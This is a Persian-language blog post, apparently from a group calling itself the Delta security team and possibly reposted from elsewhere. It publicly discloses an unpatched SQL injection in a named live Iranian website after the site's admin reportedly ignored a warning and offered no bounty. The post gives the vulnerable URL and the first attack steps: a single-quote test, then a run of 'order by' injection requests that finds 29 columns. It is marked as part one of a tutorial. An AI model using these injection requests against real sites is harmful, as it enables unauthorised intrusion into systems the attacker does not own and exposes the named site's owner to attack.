Read Time:56 Second

سلام به کاربران عزیز تیم امنیتی #دلتا

دیروز از یه سایت ایرانی باگ sqli گرفتیم و به مدیر این سایت هم هشدار دادیم اما متاسفانه خبری از #بانتی و جدی گرفتن این هشدار نبود

بر همین اساس نحوه نفوذ به این تارگت رو با شما Share میکنیم تا هم شما با این حمله آشنا بشید و هم فرهنگ بانتی در کشورمون رواج پیدا کنه
لینک آسیب پذیر :
http://superpipe.ir/plugins/spiproject/details.php?id=17952

خب در ابتدا میایم به آدرس بالا #تک_کوتیشن اضافه میکنیم

اگر ارور داد یا صفحه ناقص شد یعنی سایتمون آسیب پذیره
===================
با دستور order by میایم تعداد ستون هارو در میاریم

http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 1
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 10
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 20
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 30
http://superpipe.ir/plugins/spiproject/details.php?id=17952 order by 29

خب متوجه میشیم که این سایت 29 ستون داره

آموزش در پارت های بعدی ادامه دارد – #پارت_اول

About Post Author

Treadstone 71

@Treadstone71LLC Cyber intelligence, counterintelligence, Influence Operations, Cyber Operations, OSINT, Clandestine Cyber HUMINT, cyber intel and OSINT training and analysis, cyber psyops, strategic intelligence, Open-Source Intelligence collection, analytic writing, structured analytic techniques, Target Adversary Research, cyber counterintelligence, strategic intelligence analysis, estimative intelligence, forecasting intelligence, warning intelligence, threat intelligence
Happy
Happy
0 %
Sad
Sad
0 %
Excited
Excited
0 %
Sleepy
Sleepy
0 %
Angry
Angry
0 %
Surprise
Surprise
0 %
%d bloggers like this: